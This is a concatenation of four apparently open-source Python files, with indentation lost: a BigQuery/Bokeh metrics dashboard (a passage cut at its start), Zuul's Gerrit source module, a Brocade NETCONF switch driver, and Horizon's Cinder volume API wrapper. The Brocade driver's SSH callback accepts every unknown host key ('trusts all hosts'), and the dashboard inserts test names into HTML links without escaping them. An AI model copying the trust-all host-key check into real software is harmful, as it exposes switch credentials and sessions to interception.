SAFE_CAST(DATE(timestamp, 'US/Pacific') AS STRING) AS run_date,
max(farm_fingerprint(uuid)) as max_uuid
FROM
`{metric_table_name}`
WHERE
timestamp > '{cutoff_date}' AND
{test_name_where_clause} AND
{metric_name_where_clause}
GROUP BY
test_name, metric_name, run_date
) AS y
INNER JOIN `{metric_table_name}` AS x
ON
y.test_name = x.test_name AND
y.metric_name = x.metric_name AND
y.max_uuid = farm_fingerprint(x.uuid)
) AS metrics
INNER JOIN `{job_table_name}` AS job
ON
metrics.uuid = job.uuid
ORDER BY
run_date DESC
"""
def get_query_config(test_names, metric_names):
query_params = []
def _add_params(column_name, names):
for i, name in enumerate(names):
query_params.append({
'name': f'{column_name}{i}',
'parameterType': {'type': 'STRING'},
'parameterValue': {'value': name},
})
_add_params('test_name', test_names)
_add_params('metric_name', metric_names)
return {
'query': {
'parameterMode': 'NAMED',
'queryParameters': query_params,
}
}
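# Example of the query config produced above (illustrative names/values):
#
#   get_query_config(['resnet50'], ['accuracy'])
#   # -> {'query': {'parameterMode': 'NAMED',
#   #               'queryParameters': [
#   #                   {'name': 'test_name0',
#   #                    'parameterType': {'type': 'STRING'},
#   #                    'parameterValue': {'value': 'resnet50'}},
#   #                   {'name': 'metric_name0',
#   #                    'parameterType': {'type': 'STRING'},
#   #                    'parameterValue': {'value': 'accuracy'}}]}}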
def get_query(test_names, metric_names):
# Note that Bigquery does not support ANY, otherwise we could use a simpler
# query such as "WHERE test_name LIKE ANY(...)".
def _make_where_clause(column_name, names):
where_clause = f'({column_name} LIKE @{column_name}0'
for i in range(1, len(names)):
where_clause += f' OR {column_name} LIKE @{column_name}{i}'
where_clause += ')'
return where_clause
# TODO: Maybe make the cutoff date configurable.
cutoff_date = (datetime.datetime.now() - datetime.timedelta(
days=30)).strftime('%Y-%m-%d')
query = QUERY.format(**{
'job_table_name': os.environ['JOB_HISTORY_TABLE_NAME'],
'metric_table_name': os.environ['METRIC_HISTORY_TABLE_NAME'],
'test_name_where_clause': _make_where_clause('test_name', test_names),
'metric_name_where_clause': _make_where_clause(
'metric_name', metric_names),
'cutoff_date': cutoff_date,
})
return query
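# Sketch of how the WHERE clauses are expanded (the helper is local to get_query;
# names and values here are made up):
#
#   _make_where_clause('test_name', ['a%', 'b%'])
#   # -> '(test_name LIKE @test_name0 OR test_name LIKE @test_name1)'
#
# The placeholders are then bound by the named parameters from get_query_config,
# and JOB_HISTORY_TABLE_NAME / METRIC_HISTORY_TABLE_NAME must be set in the
# environment before calling this.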
def fetch_data(test_names, metric_names):
if not test_names or not metric_names:
raise ValueError('Neither test_names nor metric_names can be empty.')
dataframe = utils.run_query(
get_query(test_names, metric_names),
cache_key=('metrics-{}-{}'.format(str(test_names), str(metric_names))),
config=get_query_config(test_names, metric_names))
return dataframe
def make_html_table(data_grid):
if not data_grid:
return ''
cell_width = 100
normal_style = f'style="width:{cell_width}px; border:1px solid #cfcfcf"'
alert_style = f'style="width:{cell_width}px; border:1px solid #cfcfcf; background-color: #ff8a8a"'
table_width = cell_width * len(data_grid[0])
table_html = f'<table style="width:{table_width}px">'
first_row = True
for row in data_grid:
values = []
for col in row:
try:
values.append(float(col))
except ValueError:
continue
# First row uses '<th>' HTML tag, others use '<td>'.
tag_type = 'h' if first_row else 'd'
table_html += '<tr>'
for col in row:
# Use normal cell style unless the cell's value is unusually high or low.
style = normal_style
try:
v = float(col)
# Find the mean/stddev of this row's values but make sure to exclude
# the current value.
values_copy = list(values)
        for i, x in enumerate(values_copy):
          if math.isclose(x, v):
            # Remove only one matching instance; continuing to mutate the list
            # while iterating over it would skip elements.
            values_copy.pop(i)
            break
mean = np.mean(values_copy) if len(values_copy) >= 5 else 0
stddev = np.std(values_copy) if len(values_copy) >= 5 else 0
if stddev > 0 and (abs(v - mean) / stddev) > 5.0:
style = alert_style
except ValueError:
pass
table_html += f'<t{tag_type} {style}>{col}</t{tag_type}>'
table_html += '</tr>'
first_row = False
table_html += '</table>'
return table_html
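# Usage sketch (illustrative data): each inner list is one table row and the first
# row becomes the header. A numeric cell is highlighted when it sits more than 5
# standard deviations away from the mean of the other numeric cells in its row,
# and only when at least 5 such values are available.
#
#   grid = [
#       ['Test', '2020-01-01', '2020-01-02', '2020-01-03'],
#       ['<a href="metrics?test_name=t1">t1</a>', '1.01', '1.02', '9.99'],
#   ]
#   html = make_html_table(grid)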
def make_plots(test_names, metric_names, dataframe):
if not dataframe['metric_name'].any():
logging.error("Found no data: {}\n{}".format(test_names, dataframe))
return
# Split data into 1 dataframe per metric so we can easily make 1 graph
# per metric.
metric_to_dataframe = {}
for metric_name in set(np.unique(dataframe['metric_name']).tolist()):
metric_dataframe = dataframe[dataframe['metric_name'] == metric_name]
metric_to_dataframe[metric_name] = metric_dataframe
all_rows = []
for metric_name, dataframe in metric_to_dataframe.items():
plot, table_row = _make_plot_and_table(
metric_name, metric_to_dataframe[metric_name])
all_rows.extend([plot, table_row])
return all_rows
def _make_plot_and_table(metric_name, dataframe):
# Record some global stats about the entire suite of tests.
all_dates = np.unique(dataframe['run_date']).tolist()[-1::-1]
y_max = 1.1 * dataframe['metric_value'].max()
y_min = 0.9 * dataframe['metric_value'].min()
if y_max == 0 and y_min == 0:
y_max = 1.0
y_min = 0.0
# Split each test into its own dataframe.
test_name_to_df = {}
for test_name in np.unique(dataframe['test_name']).tolist():
test_name_to_df[test_name] = dataframe[dataframe['test_name'] == test_name]
tooltip_template = """
  Test: @test_name<br/>Metric Value: @metric_value<br/>Job status: @job_status<br/>Date: @run_date"""
plot = figure(
title=metric_name,
plot_width=100*len(all_dates),
y_range=(y_min, y_max),
x_range=all_dates,
toolbar_location=None,
tools="tap",
tooltips=tooltip_template)
color_mapper = CategoricalColorMapper(
factors=['success', 'failure', 'timeout'],
palette=['#000000', '#ffffff', '#ffffff'])
all_tables = []
for test, df in test_name_to_df.items():
source = ColumnDataSource(data=df)
line = plot.line(
x='run_date', y='metric_value', line_width=3, color='#000000',
source=source)
plot.circle(
x='run_date',
y='metric_value',
source=source,
fill_color={'field': 'job_status', 'transform': color_mapper},
size=15)
# Create a table representation of the data from the plot above.
# Each date is a column and each row is a test.
# Add an extra first row for the headers and an extra first
# column for the test name.
data_grid = [['-' for _ in range(len(all_dates) + 1)] for _ in range(len(
test_name_to_df.keys()) + 1)]
data_grid[0] = ['Test'] + all_dates
# Offset by 1 to account for the test name column at index 0.
run_date_to_column_index = {date: index + 1 for index, date in enumerate(
all_dates)}
for row_i, test_name in enumerate(test_name_to_df.keys()):
row_i += 1 # Offset by 1 to account for the header row at index 0.
data_grid[row_i][0] = \
f"""<a href="metrics?test_name={test_name}">{test_name}</a>"""
for row in test_name_to_df[test_name].iterrows():
metric_value = row[1]['metric_value']
run_date = row[1]['run_date']
data_grid[row_i][run_date_to_column_index[run_date]] = \
f'{metric_value:0.2f}'
table = make_html_table(data_grid)
table_row = Div(text=table)
plot.xaxis.major_label_orientation = math.pi / 3
return plot, table_row
|
|
# Copyright 2012 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
import re
import time
from zuul import exceptions
from zuul.model import Change, Ref
from zuul.source import BaseSource
# Walk the change dependency tree to find a cycle
def detect_cycle(change, history=None):
if history is None:
history = []
else:
history = history[:]
history.append(change.number)
for dep in change.needs_changes:
if dep.number in history:
raise Exception("Dependency cycle detected: %s in %s" % (
dep.number, history))
detect_cycle(dep, history)
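# Illustrative failure mode (hypothetical Change objects): if change 1 needs
# change 2 and change 2 in turn needs change 1, the walk raises:
#
#   detect_cycle(change_1)
#   # Exception: Dependency cycle detected: 1 in [1, 2]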
class GerritSource(BaseSource):
name = 'gerrit'
log = logging.getLogger("zuul.source.Gerrit")
replication_timeout = 300
replication_retry_interval = 5
depends_on_re = re.compile(r"^Depends-On: (I[0-9a-f]{40})\s*$",
re.MULTILINE | re.IGNORECASE)
def getRefSha(self, project, ref):
refs = {}
try:
refs = self.connection.getInfoRefs(project)
except:
self.log.exception("Exception looking for ref %s" %
ref)
sha = refs.get(ref, '')
return sha
def _waitForRefSha(self, project, ref, old_sha=''):
# Wait for the ref to show up in the repo
start = time.time()
while time.time() - start < self.replication_timeout:
sha = self.getRefSha(project.name, ref)
if old_sha != sha:
return True
time.sleep(self.replication_retry_interval)
return False
def isMerged(self, change, head=None):
self.log.debug("Checking if change %s is merged" % change)
if not change.number:
self.log.debug("Change has no number; considering it merged")
# Good question. It's probably ref-updated, which, ah,
# means it's merged.
return True
data = self.connection.query(change.number)
change._data = data
change.is_merged = self._isMerged(change)
if change.is_merged:
self.log.debug("Change %s is merged" % (change,))
else:
self.log.debug("Change %s is not merged" % (change,))
if not head:
return change.is_merged
if not change.is_merged:
return False
ref = 'refs/heads/' + change.branch
self.log.debug("Waiting for %s to appear in git repo" % (change))
if self._waitForRefSha(change.project, ref, change._ref_sha):
self.log.debug("Change %s is in the git repo" %
(change))
return True
self.log.debug("Change %s did not appear in the git repo" %
(change))
return False
def _isMerged(self, change):
data = change._data
if not data:
return False
status = data.get('status')
if not status:
return False
if status == 'MERGED':
return True
return False
def canMerge(self, change, allow_needs):
if not change.number:
self.log.debug("Change has no number; considering it merged")
# Good question. It's probably ref-updated, which, ah,
# means it's merged.
return True
data = change._data
if not data:
return False
if 'submitRecords' not in data:
return False
try:
for sr in data['submitRecords']:
if sr['status'] == 'OK':
return True
elif sr['status'] == 'NOT_READY':
for label in sr['labels']:
if label['status'] in ['OK', 'MAY']:
continue
elif label['status'] in ['NEED', 'REJECT']:
# It may be our own rejection, so we ignore
if label['label'].lower() not in allow_needs:
return False
continue
else:
# IMPOSSIBLE
return False
else:
# CLOSED, RULE_ERROR
return False
except:
self.log.exception("Exception determining whether change"
"%s can merge:" % change)
return False
return True
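    # Rough shape of the Gerrit submit records this walks (illustrative values):
    #
    #   data['submitRecords'] == [
    #       {'status': 'NOT_READY',
    #        'labels': [{'label': 'Code-Review', 'status': 'NEED'},
    #                   {'label': 'Verified', 'status': 'OK'}]},
    #   ]
    #
    # With allow_needs containing 'code-review', the NEED on Code-Review is treated
    # as our own pending vote and the change is still considered mergeable.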
def postConfig(self):
pass
def getChange(self, event, project):
if event.change_number:
refresh = False
change = self._getChange(event.change_number, event.patch_number,
refresh=refresh)
else:
change = Ref(project)
change.connection_name = self.connection.connection_name
change.ref = event.ref
change.oldrev = event.oldrev
change.newrev = event.newrev
change.url = self._getGitwebUrl(project, sha=event.newrev)
return change
def _getChange(self, number, patchset, refresh=False, history=None):
key = '%s,%s' % (number, patchset)
change = self.connection.getCachedChange(key)
if change and not refresh:
return change
if not change:
change = Change(None)
change.connection_name = self.connection.connection_name
change.number = number
change.patchset = patchset
key = '%s,%s' % (change.number, change.patchset)
self.connection.updateChangeCache(key, change)
try:
self._updateChange(change, history)
except Exception:
self.connection.deleteCachedChange(key)
raise
return change
def getProjectOpenChanges(self, project):
# This is a best-effort function in case Gerrit is unable to return
# a particular change. It happens.
query = "project:%s status:open" % (project.name,)
self.log.debug("Running query %s to get project open changes" %
(query,))
data = self.connection.simpleQuery(query)
changes = []
for record in data:
try:
changes.append(
self._getChange(record['number'],
record['currentPatchSet']['number']))
except Exception:
self.log.exception("Unable to query change %s" %
(record.get('number'),))
return changes
def _getDependsOnFromCommit(self, message, change):
records = []
seen = set()
for match in self.depends_on_re.findall(message):
if match in seen:
self.log.debug("Ignoring duplicate Depends-On: %s" %
(match,))
continue
seen.add(match)
query = "change:%s" % (match,)
self.log.debug("Updating %s: Running query %s "
"to find needed changes" %
(change, query,))
records.extend(self.connection.simpleQuery(query))
return records
def _getNeededByFromCommit(self, change_id, change):
records = []
seen = set()
query = 'message:%s' % change_id
self.log.debug("Updating %s: Running query %s "
"to find changes needed-by" %
(change, query,))
results = self.connection.simpleQuery(query)
for result in results:
for match in self.depends_on_re.findall(
result['commitMessage']):
if match != change_id:
continue
key = (result['number'], result['currentPatchSet']['number'])
if key in seen:
continue
self.log.debug("Updating %s: Found change %s,%s "
"needs %s from commit" %
(change, key[0], key[1], change_id))
seen.add(key)
records.append(result)
return records
def _updateChange(self, change, history=None):
self.log.info("Updating %s" % (change,))
data = self.connection.query(change.number)
change._data = data
if change.patchset is None:
change.patchset = data['currentPatchSet']['number']
if 'project' not in data:
raise exceptions.ChangeNotFound(change.number, change.patchset)
change.project = self.sched.getProject(data['project'])
change.branch = data['branch']
change.url = data['url']
max_ps = 0
files = []
for ps in data['patchSets']:
if ps['number'] == change.patchset:
change.refspec = ps['ref']
for f in ps.get('files', []):
files.append(f['file'])
if int(ps['number']) > int(max_ps):
max_ps = ps['number']
if max_ps == change.patchset:
change.is_current_patchset = True
else:
change.is_current_patchset = False
change.files = files
change.is_merged = self._isMerged(change)
change.approvals = data['currentPatchSet'].get('approvals', [])
change.open = data['open']
change.status = data['status']
change.owner = data['owner']
if change.is_merged:
# This change is merged, so we don't need to look any further
# for dependencies.
self.log.debug("Updating %s: change is merged" % (change,))
return change
if history is None:
history = []
else:
history = history[:]
history.append(change.number)
needs_changes = []
if 'dependsOn' in data:
parts = data['dependsOn'][0]['ref'].split('/')
dep_num, dep_ps = parts[3], parts[4]
if dep_num in history:
raise Exception("Dependency cycle detected: %s in %s" % (
dep_num, history))
self.log.debug("Updating %s: Getting git-dependent change %s,%s" %
(change, dep_num, dep_ps))
dep = self._getChange(dep_num, dep_ps, history=history)
# Because we are not forcing a refresh in _getChange, it
# may return without executing this code, so if we are
# updating our change to add ourselves to a dependency
# cycle, we won't detect it. By explicitly performing a
# walk of the dependency tree, we will.
detect_cycle(dep, history)
if (not dep.is_merged) and dep not in needs_changes:
needs_changes.append(dep)
for record in self._getDependsOnFromCommit(data['commitMessage'],
change):
dep_num = record['number']
dep_ps = record['currentPatchSet']['number']
if dep_num in history:
raise Exception("Dependency cycle detected: %s in %s" % (
dep_num, history))
self.log.debug("Updating %s: Getting commit-dependent "
"change %s,%s" %
(change, dep_num, dep_ps))
dep = self._getChange(dep_num, dep_ps, history=history)
# Because we are not forcing a refresh in _getChange, it
# may return without executing this code, so if we are
# updating our change to add ourselves to a dependency
# cycle, we won't detect it. By explicitly performing a
# walk of the dependency tree, we will.
detect_cycle(dep, history)
if (not dep.is_merged) and dep not in needs_changes:
needs_changes.append(dep)
change.needs_changes = needs_changes
needed_by_changes = []
if 'neededBy' in data:
for needed in data['neededBy']:
parts = needed['ref'].split('/')
dep_num, dep_ps = parts[3], parts[4]
self.log.debug("Updating %s: Getting git-needed change %s,%s" %
(change, dep_num, dep_ps))
dep = self._getChange(dep_num, dep_ps)
if (not dep.is_merged) and dep.is_current_patchset:
needed_by_changes.append(dep)
for record in self._getNeededByFromCommit(data['id'], change):
dep_num = record['number']
dep_ps = record['currentPatchSet']['number']
self.log.debug("Updating %s: Getting commit-needed change %s,%s" %
(change, dep_num, dep_ps))
# Because a commit needed-by may be a cross-repo
# dependency, cause that change to refresh so that it will
# reference the latest patchset of its Depends-On (this
# change).
dep = self._getChange(dep_num, dep_ps, refresh=True)
if (not dep.is_merged) and dep.is_current_patchset:
needed_by_changes.append(dep)
change.needed_by_changes = needed_by_changes
return change
def getGitUrl(self, project):
return self.connection.getGitUrl(project)
def _getGitwebUrl(self, project, sha=None):
return self.connection.getGitwebUrl(project, sha)
|
|
# Copyright 2013 Brocade Communications System, Inc.
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Brocade NOS Driver implements NETCONF over SSHv2 for
Neutron network life-cycle management.
"""
from ncclient import manager
from neutron.openstack.common import excutils
from neutron.openstack.common import log as logging
from neutron.plugins.brocade.nos import nctemplates as template
LOG = logging.getLogger(__name__)
SSH_PORT = 22
def nos_unknown_host_cb(host, fingerprint):
"""An unknown host callback.
Returns `True` if it finds the key acceptable,
and `False` if not. This default callback for NOS always returns 'True'
(i.e. trusts all hosts for now).
"""
return True
class NOSdriver():
"""NOS NETCONF interface driver for Neutron network.
Handles life-cycle management of Neutron network (leverages AMPP on NOS)
"""
def __init__(self):
self.mgr = None
def connect(self, host, username, password):
"""Connect via SSH and initialize the NETCONF session."""
# Use the persisted NETCONF connection
if self.mgr and self.mgr.connected:
return self.mgr
# Open new NETCONF connection
try:
self.mgr = manager.connect(host=host, port=SSH_PORT,
username=username, password=password,
unknown_host_cb=nos_unknown_host_cb)
except Exception as e:
with excutils.save_and_reraise_exception():
LOG.error(_("Connect failed to switch: %s"), e)
LOG.debug(_("Connect success to host %(host)s:%(ssh_port)d"),
dict(host=host, ssh_port=SSH_PORT))
return self.mgr
def close_session(self):
"""Close NETCONF session."""
if self.mgr:
self.mgr.close_session()
self.mgr = None
def create_network(self, host, username, password, net_id):
"""Creates a new virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.create_vlan_interface(mgr, net_id)
self.create_port_profile(mgr, name)
self.create_vlan_profile_for_port_profile(mgr, name)
self.configure_l2_mode_for_vlan_profile(mgr, name)
self.configure_trunk_mode_for_vlan_profile(mgr, name)
self.configure_allowed_vlans_for_vlan_profile(mgr, name, net_id)
self.activate_port_profile(mgr, name)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def delete_network(self, host, username, password, net_id):
"""Deletes a virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.deactivate_port_profile(mgr, name)
self.delete_port_profile(mgr, name)
self.delete_vlan_interface(mgr, net_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def associate_mac_to_network(self, host, username, password,
net_id, mac):
"""Associates a MAC address to virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.associate_mac_to_port_profile(mgr, name, mac)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def dissociate_mac_from_network(self, host, username, password,
net_id, mac):
"""Dissociates a MAC address from virtual network."""
name = template.OS_PORT_PROFILE_NAME.format(id=net_id)
try:
mgr = self.connect(host, username, password)
self.dissociate_mac_from_port_profile(mgr, name, mac)
except Exception as ex:
with excutils.save_and_reraise_exception():
LOG.exception(_("NETCONF error: %s"), ex)
self.close_session()
def create_vlan_interface(self, mgr, vlan_id):
"""Configures a VLAN interface."""
confstr = template.CREATE_VLAN_INTERFACE.format(vlan_id=vlan_id)
mgr.edit_config(target='running', config=confstr)
def delete_vlan_interface(self, mgr, vlan_id):
"""Deletes a VLAN interface."""
confstr = template.DELETE_VLAN_INTERFACE.format(vlan_id=vlan_id)
mgr.edit_config(target='running', config=confstr)
def get_port_profiles(self, mgr):
"""Retrieves all port profiles."""
filterstr = template.PORT_PROFILE_XPATH_FILTER
response = mgr.get_config(source='running',
filter=('xpath', filterstr)).data_xml
return response
def get_port_profile(self, mgr, name):
"""Retrieves a port profile."""
filterstr = template.PORT_PROFILE_NAME_XPATH_FILTER.format(name=name)
response = mgr.get_config(source='running',
filter=('xpath', filterstr)).data_xml
return response
def create_port_profile(self, mgr, name):
"""Creates a port profile."""
confstr = template.CREATE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def delete_port_profile(self, mgr, name):
"""Deletes a port profile."""
confstr = template.DELETE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def activate_port_profile(self, mgr, name):
"""Activates a port profile."""
confstr = template.ACTIVATE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def deactivate_port_profile(self, mgr, name):
"""Deactivates a port profile."""
confstr = template.DEACTIVATE_PORT_PROFILE.format(name=name)
mgr.edit_config(target='running', config=confstr)
def associate_mac_to_port_profile(self, mgr, name, mac_address):
"""Associates a MAC address to a port profile."""
confstr = template.ASSOCIATE_MAC_TO_PORT_PROFILE.format(
name=name, mac_address=mac_address)
mgr.edit_config(target='running', config=confstr)
def dissociate_mac_from_port_profile(self, mgr, name, mac_address):
"""Dissociates a MAC address from a port profile."""
confstr = template.DISSOCIATE_MAC_FROM_PORT_PROFILE.format(
name=name, mac_address=mac_address)
mgr.edit_config(target='running', config=confstr)
def create_vlan_profile_for_port_profile(self, mgr, name):
"""Creates VLAN sub-profile for port profile."""
confstr = template.CREATE_VLAN_PROFILE_FOR_PORT_PROFILE.format(
name=name)
mgr.edit_config(target='running', config=confstr)
def configure_l2_mode_for_vlan_profile(self, mgr, name):
"""Configures L2 mode for VLAN sub-profile."""
confstr = template.CONFIGURE_L2_MODE_FOR_VLAN_PROFILE.format(
name=name)
mgr.edit_config(target='running', config=confstr)
def configure_trunk_mode_for_vlan_profile(self, mgr, name):
"""Configures trunk mode for VLAN sub-profile."""
confstr = template.CONFIGURE_TRUNK_MODE_FOR_VLAN_PROFILE.format(
name=name)
mgr.edit_config(target='running', config=confstr)
def configure_allowed_vlans_for_vlan_profile(self, mgr, name, vlan_id):
"""Configures allowed VLANs for VLAN sub-profile."""
confstr = template.CONFIGURE_ALLOWED_VLANS_FOR_VLAN_PROFILE.format(
name=name, vlan_id=vlan_id)
mgr.edit_config(target='running', config=confstr)
|
|
# Copyright 2012 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Copyright 2012 OpenStack Foundation
# Copyright 2012 Nebula, Inc.
# Copyright (c) 2012 X.commerce, a business unit of eBay Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import logging
from django.conf import settings
from django.utils.translation import pgettext_lazy
from django.utils.translation import ugettext_lazy as _
from cinderclient.v2.contrib import list_extensions as cinder_list_extensions
from horizon import exceptions
from horizon.utils.memoized import memoized # noqa
from openstack_dashboard.api import base
from openstack_dashboard.api import nova
LOG = logging.getLogger(__name__)
# API static values
VOLUME_STATE_AVAILABLE = "available"
DEFAULT_QUOTA_NAME = 'default'
# Available consumer choices associated with QOS Specs
CONSUMER_CHOICES = (
('back-end', _('back-end')),
('front-end', _('front-end')),
('both', pgettext_lazy('Both of front-end and back-end', u'both')),
)
VERSIONS = base.APIVersionManager("volume", preferred_version=2)
try:
from cinderclient.v2 import client as cinder_client_v2
VERSIONS.load_supported_version(2, {"client": cinder_client_v2,
"version": 2})
except ImportError:
pass
class BaseCinderAPIResourceWrapper(base.APIResourceWrapper):
@property
def name(self):
# If a volume doesn't have a name, use its id.
return (getattr(self._apiresource, 'name', None) or
getattr(self._apiresource, 'display_name', None) or
getattr(self._apiresource, 'id', None))
@property
def description(self):
return (getattr(self._apiresource, 'description', None) or
getattr(self._apiresource, 'display_description', None))
def to_dict(self):
obj = {}
for key in self._attrs:
obj[key] = getattr(self._apiresource, key, None)
return obj
class Volume(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'description', 'size', 'status', 'created_at',
'volume_type', 'availability_zone', 'imageRef', 'bootable',
'snapshot_id', 'source_volid', 'attachments', 'tenant_name',
'os-vol-host-attr:host', 'os-vol-tenant-attr:tenant_id',
'metadata', 'volume_image_metadata', 'encrypted', 'transfer']
@property
def is_bootable(self):
return self.bootable == 'true'
class VolumeSnapshot(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'description', 'size', 'status',
'created_at', 'volume_id',
'os-extended-snapshot-attributes:project_id']
class VolumeType(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'extra_specs', 'created_at',
'os-extended-snapshot-attributes:project_id']
class VolumeBackup(BaseCinderAPIResourceWrapper):
_attrs = ['id', 'name', 'description', 'container', 'size', 'status',
'created_at', 'volume_id', 'availability_zone']
_volume = None
@property
def volume(self):
return self._volume
@volume.setter
def volume(self, value):
self._volume = value
class VolTypeExtraSpec(object):
def __init__(self, type_id, key, val):
self.type_id = type_id
self.id = key
self.key = key
self.value = val
class QosSpec(object):
def __init__(self, id, key, val):
self.id = id
self.key = key
self.value = val
class VolumeTransfer(base.APIResourceWrapper):
_attrs = ['id', 'name', 'created_at', 'volume_id', 'auth_key']
@memoized
def cinderclient(request):
api_version = VERSIONS.get_active_version()
insecure = getattr(settings, 'OPENSTACK_SSL_NO_VERIFY', False)
cacert = getattr(settings, 'OPENSTACK_SSL_CACERT', None)
cinder_url = ""
try:
# The cinder client assumes that the v2 endpoint type will be
# 'volumev2'.
if api_version['version'] == 2:
try:
cinder_url = base.url_for(request, 'volumev2')
except exceptions.ServiceCatalogException:
LOG.warning("Cinder v2 requested but no 'volumev2' service "
"type available in Keystone catalog.")
except exceptions.ServiceCatalogException:
LOG.debug('no volume service configured.')
raise
c = api_version['client'].Client(request.user.username,
request.user.token.id,
project_id=request.user.tenant_id,
auth_url=cinder_url,
insecure=insecure,
cacert=cacert,
http_log_debug=settings.DEBUG)
c.client.auth_token = request.user.token.id
c.client.management_url = cinder_url
return c
def _replace_v2_parameters(data):
if VERSIONS.active < 2:
data['display_name'] = data['name']
data['display_description'] = data['description']
del data['name']
del data['description']
return data
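# Illustrative mapping when the active cinder API version is v1 (< 2): the v2
# field names are rewritten to their v1 equivalents before the request is sent.
#
#   _replace_v2_parameters({'name': 'vol1', 'description': 'test volume'})
#   # -> {'display_name': 'vol1', 'display_description': 'test volume'}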
def version_get():
api_version = VERSIONS.get_active_version()
return api_version['version']
def volume_list(request, search_opts=None):
"""To see all volumes in the cloud as an admin you can pass in a special
search option: {'all_tenants': 1}
"""
c_client = cinderclient(request)
if c_client is None:
return []
# build a dictionary of volume_id -> transfer
transfers = {t.volume_id: t
for t in transfer_list(request, search_opts=search_opts)}
volumes = []
for v in c_client.volumes.list(search_opts=search_opts):
v.transfer = transfers.get(v.id)
volumes.append(Volume(v))
return volumes
def volume_get(request, volume_id):
volume_data = cinderclient(request).volumes.get(volume_id)
for attachment in volume_data.attachments:
if "server_id" in attachment:
instance = nova.server_get(request, attachment['server_id'])
attachment['instance_name'] = instance.name
else:
# Nova volume can occasionally send back error'd attachments
            # that lack a server_id property; to work around that we'll
# give the attached instance a generic name.
attachment['instance_name'] = _("Unknown instance")
volume_data.transfer = None
if volume_data.status == 'awaiting-transfer':
for transfer in transfer_list(request):
if transfer.volume_id == volume_id:
volume_data.transfer = transfer
break
return Volume(volume_data)
def volume_create(request, size, name, description, volume_type,
snapshot_id=None, metadata=None, image_id=None,
availability_zone=None, source_volid=None):
data = {'name': name,
'description': description,
'volume_type': volume_type,
'snapshot_id': snapshot_id,
'metadata': metadata,
'imageRef': image_id,
'availability_zone': availability_zone,
'source_volid': source_volid}
data = _replace_v2_parameters(data)
volume = cinderclient(request).volumes.create(size, **data)
return Volume(volume)
def volume_extend(request, volume_id, new_size):
return cinderclient(request).volumes.extend(volume_id, new_size)
def volume_delete(request, volume_id):
return cinderclient(request).volumes.delete(volume_id)
def volume_retype(request, volume_id, new_type, migration_policy):
return cinderclient(request).volumes.retype(volume_id,
new_type,
migration_policy)
def volume_set_bootable(request, volume_id, bootable):
return cinderclient(request).volumes.set_bootable(volume_id,
bootable)
def volume_update(request, volume_id, name, description):
vol_data = {'name': name,
'description': description}
vol_data = _replace_v2_parameters(vol_data)
return cinderclient(request).volumes.update(volume_id,
**vol_data)
def volume_reset_state(request, volume_id, state):
return cinderclient(request).volumes.reset_state(volume_id, state)
def volume_upload_to_image(request, volume_id, force, image_name,
container_format, disk_format):
return cinderclient(request).volumes.upload_to_image(volume_id,
force,
image_name,
container_format,
disk_format)
def volume_get_encryption_metadata(request, volume_id):
return cinderclient(request).volumes.get_encryption_metadata(volume_id)
def volume_snapshot_get(request, snapshot_id):
snapshot = cinderclient(request).volume_snapshots.get(snapshot_id)
return VolumeSnapshot(snapshot)
def volume_snapshot_list(request, search_opts=None):
c_client = cinderclient(request)
if c_client is None:
return []
return [VolumeSnapshot(s) for s in c_client.volume_snapshots.list(
search_opts=search_opts)]
def volume_snapshot_create(request, volume_id, name,
description=None, force=False):
data = {'name': name,
'description': description,
'force': force}
data = _replace_v2_parameters(data)
return VolumeSnapshot(cinderclient(request).volume_snapshots.create(
volume_id, **data))
def volume_snapshot_delete(request, snapshot_id):
return cinderclient(request).volume_snapshots.delete(snapshot_id)
def volume_snapshot_update(request, snapshot_id, name, description):
snapshot_data = {'name': name,
'description': description}
snapshot_data = _replace_v2_parameters(snapshot_data)
return cinderclient(request).volume_snapshots.update(snapshot_id,
**snapshot_data)
def volume_snapshot_reset_state(request, snapshot_id, state):
return cinderclient(request).volume_snapshots.reset_state(
snapshot_id, state)
@memoized
def volume_backup_supported(request):
"""This method will determine if cinder supports backup.
"""
# TODO(lcheng) Cinder does not expose the information if cinder
# backup is configured yet. This is a workaround until that
# capability is available.
# https://bugs.launchpad.net/cinder/+bug/1334856
cinder_config = getattr(settings, 'OPENSTACK_CINDER_FEATURES', {})
